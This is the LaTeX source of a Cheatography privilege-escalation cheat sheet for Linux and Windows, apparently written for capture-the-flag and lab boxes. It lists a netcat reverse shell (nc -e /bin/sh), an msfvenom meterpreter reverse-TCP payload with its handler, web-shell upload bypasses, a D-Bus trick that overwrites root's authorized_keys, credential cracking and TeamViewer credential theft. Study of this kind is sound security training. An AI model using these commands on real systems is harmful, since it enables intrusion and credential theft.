\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{blacklist\_} \pdfinfo{ /Title (linux-windows-privilege-escalation.pdf) /Creator (Cheatography) /Author (blacklist\_) /Subject (Linux | Windows Privilege Escalation Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands 
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{292421} \definecolor{LightBackground}{HTML}{F8F8F8} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Linux | Windows Privilege Escalation Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{blacklist\_} via \textcolor{DarkBackground}{\uline{cheatography.com/121658/cs/22362/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}blacklist\_ \\ \uline{cheatography.com/blacklist} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 27th February, 2021.\\ Page {\thepage} of \pageref{LastPage}. 
\end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{x{2.16 cm} x{5.84 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{HTTP Status Codes}} \tn % Row 0 \SetRowColor{LightBackground} Code \seqsplit{(Gobuster)} & Status \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} 2XX & \{\{fa-bolt\}\} Success \{\{nl\}\}\{\{fa-bolt\}\} This class of status codes indicates the action requested by the client was received, understood and accepted. \tn % Row Count 8 (+ 6) % Row 2 \SetRowColor{LightBackground} 3XX & \{\{fa-bolt\}\}Redirection \{\{nl\}\}\{\{fa-bolt\}\} This class of status code indicates the client must take additional action to complete the request. \tn % Row Count 13 (+ 5) % Row 3 \SetRowColor{white} 4XX & \{\{fa-bolt\}\} Client Error \{\{nl\}\}\{\{fa-bolt\}\} This class of status code is intended for situations in which the error seems to have been caused by the client. 
\tn % Row Count 19 (+ 6) % Row 4 \SetRowColor{LightBackground} 5xx & \{\{fa-bolt\}\} Server Error \tn % Row Count 20 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{https://www.restapitutorial.com/httpstatuscodes.html}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} View Source Code & Read it \seqsplit{(enumeration/directory)} \{\{fa-bolt\}\{\{nl\}\} Read hints Carefully and use find and locate command \tn % Row Count 7 (+ 6) % Row 2 \SetRowColor{LightBackground} Gobuster & Dirb buster \tn % Row Count 8 (+ 1) % Row 3 \SetRowColor{white} Nmap Scan & -A (aggressive) -p- (all ports) \tn % Row Count 10 (+ 2) % Row 4 \SetRowColor{LightBackground} Steganography & \seqsplit{https://0xrick.github.io/lists/stego/} \tn % Row Count 12 (+ 2) % Row 5 \SetRowColor{white} Ftp & Penetration testing of ftp port. \{\{nl\}\} \{\{fa-bolt\}\} \{\{nl\}\} It can be brute forced using hydra. \{\{fa-bolt\}\}\{\{nl\}\} ftp \textless{}ipaddr\textgreater{} to connect and \textless{}get\textgreater{} files. \tn % Row Count 20 (+ 8) % Row 6 \SetRowColor{LightBackground} Think like an hacker & What can i do from here \{\{nl\}\} \{\{fa-bolt\}\}Where can i look (any hints given) \tn % Row Count 24 (+ 4) % Row 7 \SetRowColor{white} Common Username/Password & admin:admin admin:admin123 admin:password root:password root:root and admin:fileserver \tn % Row Count 29 (+ 5) % Row 8 \SetRowColor{LightBackground} Web shell & \{\{fa-bolt\}\} Provides us to enable with remote administration on the target server \{\{nl\}\}\{\{fa-bolt\}\} We can add or modify some data (deface it) as a webadmin. 
So after we get the web site admin access, our aim is to get web server access. \tn % Row Count 41 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 9 \SetRowColor{LightBackground} Information Gathering & \{\{fa-bolt\}\} Search the website for blog posts, team pages or document metadata that leak names; gather everything and think about how it can be used (username candidates, password spraying, social engineering) \{\{nl\}\} \{\{fa-bolt\}\} If you need an email address, work out the organisation's address format from any example you find (e.g. \seqsplit{initials@domain\_name} or \seqsplit{first.last@domain\_name}) and apply it to the names you collected \tn % Row Count 15 (+ 15) % Row 10 \SetRowColor{white} Directory Enumeration Wordlists & \{\{fa-bolt\}\} Dirbuster medium \{\{fa-bolt\}\} Dirb common \{\{fa-bolt\}\} rockyou (a password list -{}- use it for credential brute force, not for directory names) \tn % Row Count 19 (+ 4) % Row 11 \SetRowColor{LightBackground} Steghide and Binwalk & Steghide only supports JPEG, BMP, WAV and AU carriers (not PNG) and typically hides a small file such as a text file; binwalk scans any file for embedded file signatures (e.g. a zip appended to a PNG) and can carve them out with -e \{\{nl\}\} Rule of thumb: run binwalk, exiftool and strings on every image (zsteg for PNG), and steghide -{}-extract on JPEGs, trying an empty passphrase first \tn % Row Count 28 (+ 9) % Row 12 \SetRowColor{white} Identify hash & hashid 'hash' and ciphey tool \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 13 \SetRowColor{LightBackground} Reset a stale hashcat session lock & `rm -rf \textasciitilde{}/.hashcat/sessions/hashcat.pid` \{\{nl\}\} This only removes the pid file left behind by a killed session (the "Already an instance running" error); it does not stop a running hashcat -{}- press q inside the session or kill the process for that \tn % Row Count 2 (+ 2) % Row 14 \SetRowColor{white} Nmap script scans & nmap -sV -A -{}-script vuln \textless{}ip\textgreater{} \tn % Row Count 4 (+ 2) % Row 15 \SetRowColor{LightBackground} JWT CRACK & hashcat -a 0 -m 16500 crack.txt /rockyou (mode 16500 = JWT; only works when the token is HMAC-signed, HS256/384/512, with a guessable secret) \tn % Row Count 6 (+ 2) % Row 16 \SetRowColor{white} HTTP running & \{\{fa-bolt\}\} dirb \{\{fa-bolt\}\} try https://\textless{}ip\textgreater{} \{\{fa-bolt\}\} robots.txt 
\{\{fa-bolt\}\} Page source \tn % Row Count 11 (+ 5) % Row 17 \SetRowColor{LightBackground} Wordpress & \{\{fa-bolt\}\} \seqsplit{https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/} \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://blog.wpscan.org/assets/posts/wpscan-posters/WPScan\_CLI\_Cheat\_Sheet.pdf} \tn % Row Count 22 (+ 11) % Row 18 \SetRowColor{white} Wordpress - get reverse shell & \{\{fa-bolt\}\} Username enumeration \{\{fa-bolt\}\} Brute force Password \{\{fa-bolt\}\} Login and upload shell to get session \{\{nl\}\}\{\{fa-bolt\}\} To upload PHP shell either upload it as a PLUGIN or Edit Theme, exploitDB - PHP plugin , MSF - PHP/reverse\_tcp and PHP reverse shell can be uploaded \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://www.hackingarticles.in/wordpress-reverse-shell/} \tn % Row Count 40 (+ 18) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 19 \SetRowColor{LightBackground} File Upload Bypass \& Pentest Monkey Shell & \{\{fa-bolt\}\} Intercept request \textgreater{} play with it and check response is highly important \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/strawp/web-shells"\}\}Collection of Web-Shells\{\{/link\}\}\{\{nl\}\}\{\{fa-bolt\}\} Guides - Hacktricks bypass file upload \& Hacker's Grimoire Book \{\{nl\}\} \{\{fa-bolt\}\} We can use hacktricks, first try out every single extensions and then try double extensions. 
Or use Burp Suite to bruteforce \tn % Row Count 21 (+ 21) % Row 20 \SetRowColor{white} Bypass File Upload & \{\{fa-bolt\}\} Download PHP pentest monkey rev shell \{\{nl\}\}\{\{fa-bolt\}\} rev shell with GIF89a on top (fakes the image magic bytes so content-sniffing checks pass) \{\{nl\}\}\{\{fa-bolt\}\} Now change extension \{\{nl\}\}\{\{fa-bolt\}\} Upload it but wont execute \{\{nl\}\}\{\{fa-bolt\}\} Now upload again and intercept \{\{nl\}\}\{\{fa-bolt\}\} Intercept through Burp \{\{nl\}\}\{\{fa-bolt\}\} Edit the request and change that file to .gif.php (if rejected, also vary case, try other PHP extensions and change the Content-Type header) \{\{nl\}\}\{\{fa-bolt\}\} Done just execute the shell through PATH \{\{nl\}\}\{\{fa-bolt\}\} Use nc to capture the connection \tn % Row Count 44 (+ 23) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 21 \SetRowColor{LightBackground} Abusing the USBCreator D-Bus service & \{\{fa-bolt\}\} The com.ubuntu.USBCreator.Image method copies an arbitrary source file to an arbitrary destination as root (usb-creator-helper runs as root on the system bus). We use it to overwrite /root/.ssh/authorized\_keys with a file containing our own public key, then ssh in as root with the matching private key \{\{nl\}\}\{\{fa-bolt\}\} gdbus call -{}-system -{}-dest \seqsplit{com.ubuntu.USBCreator} -{}-object-path \seqsplit{/com/ubuntu/USBCreator} -{}-method \seqsplit{com.ubuntu.USBCreator.Image} \seqsplit{/home/nadav/authorized\_keys} \seqsplit{/root/.ssh/authorized\_keys} true \{\{nl\}\}\{\{fa-bolt\}\} An empty tuple () as reply means the method returned without error, i.e. the privileged copy happened. Root's original authorized\_keys is clobbered, so copy it out first (same method, reversed arguments) if you need to restore it \tn % Row Count 21 (+ 21) % Row 22 \SetRowColor{white} DBus & \{\{fa-bolt\}\} D-Bus is a general inter-process message bus (a system bus for root-owned services plus a per-user session bus), not a USB-specific mechanism; usb-creator just happens to expose a privileged service on it \{\{nl\}\} \{\{fa-bolt\}\} Clients send method calls to a named service and object path, and the bus daemon routes them to the process owning that name \{\{nl\}\}\{\{fa-bolt\}\} SUID is not the precondition here: whether an unprivileged user may call a method is decided by the service's polkit policy (for USBCreator typically members of the sudo/admin group), so check your groups with id and enumerate services with busctl list and busctl introspect \tn % Row Count 34 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 23 
\SetRowColor{LightBackground} Bruteforce vhosts / subdomains using FFUF & \{\{fa-bolt\}\} ffuf -w \seqsplit{SecLists/Discovery/DNS/subdomains-top1million-5000}.txt -u \seqsplit{http://undiscovered.thm/} -H "Host: \seqsplit{FUZZ.undiscovered.thm"} -fc 302 \{\{nl\}\} ffuf -w \seqsplit{/usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000}.txt -u \seqsplit{http://delivery.htb/} -H "Host: FUZZ.delivery.htb" -fw 486 \{\{nl\}\}\{\{fa-bolt\}\} Wc is to filter with word. To learn more visit \{\{link="https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480"\}\} FFUF Fuzzing Filtering\{\{/link\}\} \tn % Row Count 24 (+ 24) % Row 24 \SetRowColor{white} Bruteforcing directory along with extensions & gobuster dir -u \textless{}ip\textgreater{} -w \seqsplit{/usr/share/wordlists/dirbuster/directory-list-2}.3-medium.txt -t 42 -x .bak,.php \tn % Row Count 30 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 25 \SetRowColor{LightBackground} Fuzzing vs Bruteforce & \{\{fa-bolt\}\} Brute forcing is an attack method of just trying all passwords, in a password brute force anyway. Fuzzing is a method of sending malformed or abnormal data to a service in an attempt to get it to misbehave in some way, which could lead to the discovery of vulnerabilities from denial of service, buffer overflows or remote code execution etc. FUZZ can be done for subdomains too, and sending payloads to find LFI or RCE etc.. 
\tn % Row Count 22 (+ 22) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Linux Escalation Techniques -\textgreater{} \seqsplit{http://xiphiasilver.net/2018/04/26/annotation-abusing-sudo-linux-privilege-escalation/\#disqus\_thread} \newline \newline Web enumeration -\textgreater{} \seqsplit{https://berzerk0.github.io/GitPage/CTF-Writeups/Optimum-HTB.html}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows)}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Nmap -\textgreater{} Service Enumeration & The services running helps us in identifying our next steps \{\{nl\}\} \{\{fa-bolt\}\} Kerberos was running on port 88 so we could launch a Kerberos pre authentication attack \{\{nl\}\} \{\{fa-bolt\}\} If many services are running try enum4linux \{\{nl\}\} \{\{fa-bolt\}\} Website upload shell and access it \tn % Row Count 16 (+ 15) % Row 2 \SetRowColor{LightBackground} nmap -sV -{}-script=nfs-showmount \textless{}target\textgreater{} & \{\{fa-bolt\}\} Nmap script scan and Nmap scan \{\{fa-bolt\}\} 2049 (port no) \tn % Row Count 20 (+ 4) % Row 3 \SetRowColor{white} NFS (mount the drive to access it) & \{\{fa-bolt\}\} Network File System permits a user on a client machine to mount the shared files or directories over a network. 
\{\{nl\}\} \{\{fa-bolt\}\} showmount -e \textless{}target\textgreater{} \tn % Row Count 29 (+ 9) % Row 4 \SetRowColor{LightBackground} Mount the content of shared folder -t (type) nfs/iso & mount -t nfs ip:/drive\_name /mnt/folder\_name \{\{nl\}\} \{\{fa-bolt\}\} There is a possibility to access the root folder by :/ and then navigate to other folder such as root \{\{nl\}\} \{\{fa-bolt\}\} There is a way to detach a busy device immediately \#umount -l and then delete the contents \tn % Row Count 43 (+ 14) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Google where does CMS (umbraco) store credentials & \{\{fa-bolt\}\} Appdata/.sdf file extension normally contain standard database files that store data in a structured file format. \{\{nl\}\} \{\{fa-bolt\}\} cat Umbraco.sdf | grep admin \tn % Row Count 9 (+ 9) % Row 6 \SetRowColor{white} Hashcat to crack password hash & \{\{fa-bolt\}\} hashcat -a 0 -m 100 crack.hash \seqsplit{/usr/share/wordlists/rockyou}.txt \tn % Row Count 13 (+ 4) % Row 7 \SetRowColor{LightBackground} Whenever you get interface try to find upload panel & \{\{fa-bolt\}\} Upload reverse shell then browse the directory to execute it on the remote machine to get a reverse shell \tn % Row Count 19 (+ 6) % Row 8 \SetRowColor{white} Windows reverse shell payload & \{\{fa-bolt\}\} msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=10.10.14.89 LPORT=4455 -f exe \textgreater{} blacklist.exe \{\{nl\}\} \{\{fa-bolt\}\} Upload it \tn % Row Count 26 (+ 7) % Row 9 \SetRowColor{LightBackground} C:/Inetpub (cve browse to access payoad) 'ls C:/' & \{\{fa-bolt\}\} Inetpub is the folder on a computer that is the default folder for Microsoft Internet Information Services (IIS). 
The website content and web apps are stored in the inetpub folder --- which keeps it organized. Everything under wwwroot is also web-reachable, which is exactly why a payload uploaded there can be fetched or triggered over HTTP. \tn % Row Count 38 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 10 \SetRowColor{LightBackground} Access the payload & \{\{fa-bolt\}\} python exploit.py -u admin@htb.local -p baconandcheese -i \seqsplit{'http://10.10.10.180'} -c powershell.exe -a \seqsplit{'C:/inetpub/wwwroot/media/1034/blacklist}.exe' (the exploit needs valid Umbraco admin credentials, here the ones recovered from the .sdf file, and runs the uploaded exe on the server) \tn % Row Count 8 (+ 8) % Row 11 \SetRowColor{white} Listen for connection & \{\{fa-bolt\}\} use \seqsplit{exploit/multi/handler} \{\{nl\}\} \{\{fa-bolt\}\} set payload \seqsplit{windows/meterpreter/reverse\_tcp} \{\{nl\}\} \{\{fa-bolt\}\} The handler payload, LHOST and LPORT must match exactly what msfvenom generated above; a staged x86 meterpreter will not complete against a \seqsplit{windows/x64/shell\_reverse\_tcp} handler. Use shell\_reverse\_tcp only if that is what you generated. Start it with run -j before triggering the payload \tn % Row Count 14 (+ 6) % Row 12 \SetRowColor{LightBackground} Upload Winpeas and access using CVE & \{\{fa-bolt\}\} Privilege Escalation Awesome Scripts \tn % Row Count 17 (+ 3) % Row 13 \SetRowColor{white} winPEAS & \{\{fa-bolt\}\} Application area we can see Teamviewer and check it using shell \{\{nl\}\} \{\{fa-bolt\}\} Use metasploit to gain access to credentials \{\{nl\}\} \{\{fa-bolt\}\} run \seqsplit{post/windows/gather/credentials/teamviewer\_passwords} from the meterpreter session (it reads and decrypts the TeamViewer settings stored in the registry) \tn % Row Count 28 (+ 11) % Row 14 \SetRowColor{LightBackground} Evil-Winrm : Winrm Pentesting Framework & \{\{fa-bolt\}\} Evil-WinRM is a WinRM (PowerShell Remoting, TCP 5985/5986) client used in the post-exploitation phase once you hold valid credentials or an NTLM hash: it gives an interactive PowerShell shell with upload/download, in-memory script loading and pass-the-hash (-H). \{\{nl\}\} \{\{fa-bolt\}\} The target account must be allowed remote management (by default local Administrators and the Remote Management Users group); port 5985 open in nmap is the hint to try it. \tn % Row Count 41 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 15 \SetRowColor{LightBackground} Evil Winrm & evil-winrm -u Administrator -p '!R3m0te!' 
-i '10.10.10.180' \tn % Row Count 3 (+ 3) % Row 16 \SetRowColor{white} Enum4linux & \{\{fa-bolt\}\} Enum4linux is an enumeration tool capable of detecting and extracting data from Windows and Linux operating systems, including those that are Samba (SMB) hosts on a network. Enum4linux is capable of discovering the following: Password policies on a target, The operating system of a remote target, Shares on a device (drives and folders), Domain and group membership, User listings. Try it with null credentials first; much of this only works if anonymous/guest SMB access is still enabled \tn % Row Count 23 (+ 20) % Row 17 \SetRowColor{LightBackground} GetNPUsers.py (impacket, AS-REP roasting) & \{\{fa-bolt\}\} GetNPUsers.py \textless{}domain\_name\textgreater{}/ -dc-ip \textless{}ip\textgreater{} -usersfile users.txt -format hashcat -request \{\{nl\}\} \{\{fa-bolt\}\} Accounts with "Do not require Kerberos preauthentication" set answer an AS-REQ from anyone with an AS-REP whose encrypted part is keyed from the user's password, so it can be cracked offline (hashcat -m 18200). Without credentials you need a candidate username list (names gathered earlier, or kerbrute); with one valid domain account the script enumerates the vulnerable users itself. It only tells you which accounts are vulnerable -{}- cracking success still depends on password strength \tn % Row Count 38 (+ 15) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 18 \SetRowColor{LightBackground} Domain Controller , Active Directory & \{\{fa-bolt\}\} A Windows Domain allows management of large computer networks \{\{nl\}\} \{\{fa-bolt\}\} They use a Windows server called a DC (domain controller) \{\{nl\}\} \{\{fa-bolt\}\} A DC is any server that has the Active Directory Domain Services role \{\{nl\}\} \{\{fa-bolt\}\} DCs respond to authentication requests across the domain (Kerberos on 88, LDAP on 389/636, SMB on 445) \{\{nl\}\} \{\{fa-bolt\}\} DCs have the tool AD (active directory) and GP (group policy) \{\{nl\}\} \{\{fa-bolt\}\} AD contains objects and OUs (Organizational Units) \{\{nl\}\} \{\{fa-bolt\}\} GP contains GPOs (Group Policy objects) that manage settings for AD objects \tn % Row Count 28 (+ 28) % Row 19 \SetRowColor{white} Kerberos Cheatsheet & 
\seqsplit{https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a} \tn % Row Count 32 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 20 \SetRowColor{LightBackground} SMB (netbios-sn) & SMB ports are open. We need to do the usual tasks: check for anonymous login, list shares and check permissions on shares. \{\{nl\}\} \{\{fa-bolt\}\} \tn % Row Count 8 (+ 8) % Row 21 \SetRowColor{white} SMB enumeration & smbclient -L ip and access smbclient \seqsplit{//192.168.1.108/share\_name} \tn % Row Count 12 (+ 4) % Row 22 \SetRowColor{LightBackground} Notes in Kali & Windows Priv. Esc. \tn % Row Count 13 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite} \newline \newline https://book.hacktricks.xyz/windows/active-directory-methodology} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Linux privilege cheatsheet & \{\{fa-bolt\}\} \seqsplit{https://guide.offsecnewbie.com/privilege-escalation/linux-pe\#cron-jobs} \{\{nl\}\}\{\{fa-bolt\}\} Hack tricks \{\{nl\}\}\{\{fa-bolt\}\} Hacking articles \tn % Row Count 9 (+ 8) % Row 2 \SetRowColor{LightBackground} OSCP Cheatsheet & \seqsplit{https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html} \{\{nl\}\} \{\{nl\}\} \seqsplit{https://vulp3cula.gitbook.io/hackers-grimoire/} \tn % Row Count 16 (+ 7) % Row 3 \SetRowColor{white} Linpeas, Linenum, Linux exploit suggestor & \{\{fa-bolt\}\} 
Linpeas - Hacktricks checklist \{\{nl\}\} \{\{fa-bolt\}\} SUID command - find / -perm -u=s -type f 2\textgreater{}/dev/null \{\{nl\}\} \{\{fa-bolt\}\} Sudo -l \{\{nl\}\} \{\{fa-bolt\}\} Cron jobs cat /etc/crontab \tn % Row Count 26 (+ 10) % Row 4 \SetRowColor{LightBackground} Netcat & nc -e /bin/sh \textless{}ipadd\textgreater{} \textless{}port\textgreater{} (target) \tn % Row Count 28 (+ 2) % Row 5 \SetRowColor{white} & nc -lvp \textless{}port\textgreater{} (host) \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 6 \SetRowColor{LightBackground} msfconsole | Cheatsheet & Power up metasploit \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/"\}\} Metasploit Cheatsheet\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit"\}\} Github Reverse shell msfconsole\{\{/link\}\} \tn % Row Count 16 (+ 16) % Row 7 \SetRowColor{white} use exploit/\textless{}path\textgreater{} & specify exploit to use \tn % Row Count 18 (+ 2) % Row 8 \SetRowColor{LightBackground} show options & set the specific options \tn % Row Count 20 (+ 2) % Row 9 \SetRowColor{white} show target (set target no) & set the specific target like power shell, PHP, python \tn % Row Count 23 (+ 3) % Row 10 \SetRowColor{LightBackground} connect to rdp service using rdp client \{\{nl\}\} Windows & 3389:RDP\{\{nl\}\}\{\{fa-bolt\}\}start Remmina to access then enter ip address then enter username,domain and password \tn % Row Count 29 (+ 6) % Row 11 \SetRowColor{white} \{\{fa-linux\}\} Linux Privilege Escalation & \{\{fa-linux\}\} \{\{fa-linux\}\} \{\{fa-linux\}\} \{\{fa-linux\}\} \tn % Row Count 32 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak 
